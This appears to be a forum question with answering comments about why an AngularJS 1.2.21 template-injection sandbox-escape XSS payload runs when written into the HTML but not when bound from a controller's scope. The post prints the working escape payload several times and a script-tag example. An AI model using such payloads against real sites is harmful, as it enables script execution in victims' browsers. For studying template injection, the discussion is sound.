# Angular XSS not evaluated

Tags: xss, angularjs

Using an older version of AngularJS : 1.2.21 from example, there are some playload that can generate an XSS.

```
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
```

But when this payload is stocked into a `$scope`, it doesn't work. 
There is a [live example](http://jsbin.com/zobobikivi/edit?html,js,output) on JsBin

If payload is directly passed into the HTML, the XSS it works fine.
But if the payload is passed from the scope, it doesn't work

I don't understand why the second payload is not executed.

```
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>Angular JS</title>
</head>
<body ng-app="jsbin">
  <div ng-controller="DemoCtrl as demo">
    <h1>Hello {{demo.name}}</h1>

     {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert('working if not in scope')"].sort(toString.constructor);}}

  </div>
  <script src="//cdnjs.cloudflare.com/ajax/libs/angular.js/1.2.21/angular.js"></script>

</body>
</html>
```

The controller :

```
var app = angular.module('jsbin', []);

app.controller('DemoCtrl', function() {
  this.name = 'toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);';
});
```

Comment: When it's in the HTML, Angular is treating it as an expression. When it's passed from the scope, Angular is treating it as a string, so it doesn't try to parse it at all

Comment: paj28 is correct. His comment should be treated as the answer.

Comment: @paj28 so stored xss cannot append in this case rigth ?

Comment: Yeah, I don't think it's possible in this case. If the app did something like $sce.trustAsHtml then it might be.

Comment: @paj28 not with trusted html http://jsbin.com/zawunuhaxo/edit?html,js,output

Comment: With trustAsHtml a payload would look like <script>alert(1)</script>. The payload you have looks like an example of "Server-side template injection". Google it - there's a good lot of info online.